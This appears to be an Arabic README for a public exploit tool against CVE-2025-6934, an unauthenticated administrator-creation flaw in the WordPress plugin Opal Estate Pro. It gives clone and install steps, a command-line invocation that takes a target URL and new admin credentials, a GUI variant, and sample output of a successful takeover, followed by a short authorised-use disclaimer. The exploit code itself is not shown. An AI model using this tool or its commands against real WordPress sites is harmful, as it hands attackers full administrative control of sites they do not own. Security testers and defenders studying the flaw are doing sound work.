
أداة استغلال CVE-2025-6934 — إنشاء حساب مسؤول بدون مصادقة في إضافة ووردبريس Opal Estate Pro
تم إنشاء وتطوير هذا المشروع بالكامل بواسطة mejbankadir (SMH tech و Mejban HackSheild تحت مظلة NexoAmicus)
CVE-2025-6934 هي ثغرة أمنية حرجة في إضافة ووردبريس Opal Estate Pro (الإصدارات <= 1.7.5) تسمح للمهاجمين غير المُصادَق عليهم بإنشاء حسابات مسؤول على مواقع ووردبريس المعرضة للخطر.
توفر هذه الأداة نسختين: CLI (واجهة سطر الأوامر) وGUI (واجهة المستخدم الرسومية) لاستغلال هذه الثغرة.
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
ميزات الواجهة الرسومية:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
الوسائط:
-u, --url Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ تحذير: تم توفير هذه الأداة لأغراض التعليم واختبار الأمان المصرح به فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي.
باستخدامك لهذه الأداة، فأنت توافق على:
- اختبار الأنظمة التي تمتلكها فقط، أو التي لديك إذن صريح باختبارها
- عدم استخدام هذه الأداة لأغراض خبيثة
- تحمل كامل المسؤولية عن أي عواقب قانونية
| الدور | الاسم |
|---|---|
| المُنشئ والمطوّر | mejbankadir |
| المنظمة | SMH tech و Mejban HackSheild تحت مظلة NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
تقوم الأداة تلقائيًا بتعطيل تحذيرات SSL. إذا واجهت مشكلات:
requests.packages.urllib3.disable_warnings()
رخصة MIT
حقوق النشر (c) 2025 mejbankadir (SMH tech و Mejban HackSheild تحت مظلة NexoAmicus)
صُنع بكل ❤️ بواسطة mejbankadir
SMH tech | Mejban HackSheild | تحت مظلة NexoAmicus
| الخاصية | القيمة |
|---|
| معرف CVE | CVE-2025-6934 |
| الخطورة | حرجة (CVSS 3.1: 9.8) |
| الإضافة المتأثرة | Opal Estate Pro |
| الإصدارات المتأثرة | <= 1.7.5 |
| نوع الثغرة | إنشاء حساب مسؤول بدون مصادقة |
| متجه CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |